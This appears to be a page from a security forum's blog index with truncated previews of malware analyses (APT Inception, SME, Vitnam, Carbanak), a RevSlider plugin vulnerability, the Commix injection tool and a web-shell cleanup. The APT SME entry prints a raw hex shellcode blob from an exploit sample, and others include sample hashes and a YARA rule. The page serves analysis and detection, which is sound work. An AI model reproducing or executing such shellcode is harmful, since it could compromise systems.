View RSS Feed

All Blog Entries

  1. How to Setup Secure Website for Hackers

    When security researchers and hackers want to setup a self blog, the biggest stress on their head is what to do to secure their server(s) and site(s). what if someone come and naughty their server(s) ? what if server get DOS/DDOS attack when they donít have access to fix up their server(s) and they are travelling or go for business or something and they canít access their server(s) for some reason. After some years that I spent my life on information security I release that nothing canít be secure ...

    Updated 05-29-2015 at 08:59 PM by G3n3Rall

    Tags: linux, php, python, service, waf, zap Add / Edit Tags
    Categories
    Uncategorized
  2. Commix : Automated All-in-One OS Command Injection and Exploitation Tool

    Quote Originally Posted by plage View Post
    Hello all, It recently came to my attention a command injection exploitation tool, which has the name commix ( 1 ) and by using it, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string.

    Commix seems to be a great command injection tool which successfully exploits many vulnerable applications such as DVWA, bWAPP, ShelLOL, Persistence, Kioptrix(2014), w3af-moth etc.

    I found references on that tool in many sites,
    ...
    Categories
    Uncategorized
  3. WordPress Plugin Ė Revslider update captions CSS file critical vulnerability

    Today being another day at work for SecureLayer7 to recover our clientís defaced website, and bang I think I hit upon a nasty vulnerability of a famous plugin.

    Although we successfully patched the vulnerability and we fixed the undoing of the blacklisting. On further research I stumbled upon its usage over the internet and as it turns out large number of web users online are affected, putting them to greater risk if not mitigated with a proper patch or an update.

    Following ...
    Tags: '(."(, upyx Add / Edit Tags
    Categories
    Uncategorized
    Attached Thumbnails Attached Images  
  4. Apt inception

    Greet: "Vinnu", "nightrover","bond"

    In the month of Dec 2014 BlueCoat released report on APT campaign named ad "Inception". The spear phishing mail was sent with attachment with various names we analyzed attachment which was named as "Car for sale.doc". The Attachment was exploit (CVE-2012-0158) with embed VBS and decoy file themed an advertisement of a used car for sale that purportedly originated from Michael Hahne employee at the ...

    Updated 03-23-2015 at 05:59 PM by 41.w4r10r

    Categories
    Uncategorized
  5. Apt sme

    Greet : "Vinnu", "nightrover","bond"

    I have used name "APT SME " because payload developer have used the name for his project.I have just created automation to exctract payload file from the exploit used in APT SME.

    Sample used for creating Automation:
    Md5 - 57A8DB5A5D35464BE16518332A64A992

    Shellcode:

    Code:
    e80000000081efb178fd9401f76681e6a9008b04248d7424186681cfa81d83c40181f782e7813383c40281e7e3000000446681eeb25e83e8056689ff66c1ef7905c00000006681e7bc00bb84feffffc1e66cf7db8d7c241883e20066c1e6f880e50001f680c5378d74242080c5b46601f666478a0883e76e01fe30e96681ce483df6c101751581f782e7813380c1016681cee476eb106681f7ecf181ce63af2725fec9c1e63bc1efed880866c1e74d83c2016629f783e8ff8d7c240439da75b1db238e619bda619ce6619cf66184e261acca61dc8cd3a2f29f1861afd661beef92eb006198caeb04db23ab47eb0261f2c1b2ee6b110fca37159f05a361b0ceeb018c61e6a161b0f6eb01e9c661bfdb318c6b2115e5a980e2b961aecee2153a6f2a9f0752a5a588886335459f02459f0f6bd54d4d31319f32bcbdb963146904e2537344e8ea522f77f66b5579ebeaeb1d0dd8ecac0813b1b5b4d747f370699f5a692deeb3bddb235c38546744e8ea60fd6a10ea9ee36a2ceed2189ee8da1862fdabadd31b9f02b58c53a7b08c63e5bddb238e619bda619ce6619cf66184e26194ca61dcd2a5f29f1901a3b58207d38bf0153d821515e5ea15dece82eaeaeeea153aefeafaeaeaba159eceeedb232deaeaeaeaea692bee692aee6b13ea7ae9ea9f06b4b553cfe6eaeabc6b2c8248e8eabd194e29025815151561afd661b6ef92eb0161a1f209d8a361a9caeb0261de62eb04db2a7346eb282b20e7a2931dd1beceee9f0b61a9ceeb028c61e6a261a9f6eb0261ee62eb026313b0b4b82900
    ...

    Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

    Categories
    Uncategorized
  6. Apt vitnam

    Greet :- "vinnu","nightrover","bond"

    I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here i have automated a process through which we can extract an Executable from rtf exploit.

    Yara Rule:
    Code:
    rule APT_VITNAM {
      meta:
       author = "w@rri0r@bh@y"
      strings :
       $magic = "{\\rt"
       $v0 = "eb00eb1490905e33c980368746"
    ...

    Updated 03-20-2015 at 02:35 PM by [s]

    Categories
    Uncategorized
  7. Apt carbanak

    Greet : "Vinnu", "nightrover","bond"

    All the analysis is done by "Kaspersky" company. I have just created automation to exctract payload from the exploit used in APT CARBANAK.

    Sample used for creating Automation:
    Md5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298 ...

    Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

    Categories
    Uncategorized
  8. Collective Intelligence Framework Ė An awesome and pretty useful project

    Hello Hackers!

    How are you doing?
    I am here today to shed some light on a nice and open source project called Collective Intelligence Framework (CIF).

    About 70 % of internet traffic is Ö. Wait for it Ö. SPAM! If you donít believe me, install a service honeypot, give it about 10 minutes and then see the magic. Or get your machine direct public interface and start TCPDump.

    The internet if full of crap / awesome stuff (in the eye of the beholder) like exploit ...
  9. Malware Cleanup: Analysis of an Undetectable web-shell code uploaded, RevSlider bug

    I started my day with my regular Malware Cleanup activity and came across an interesting backdoor web shell file on the server. The server is not specific to any particular environment, it was one of the regularly updated WordPress package with the plugin RevSlider Plugin ver. 4.1.4 .

    I initiated the process to detect the backdoors and web malwares, and got a hit on a malicious .htaccess file which was redirecting hxxp://m.mobi-avto.ru as shown below:

    ...
Page 2 of 14 FirstFirst 123412 ... LastLast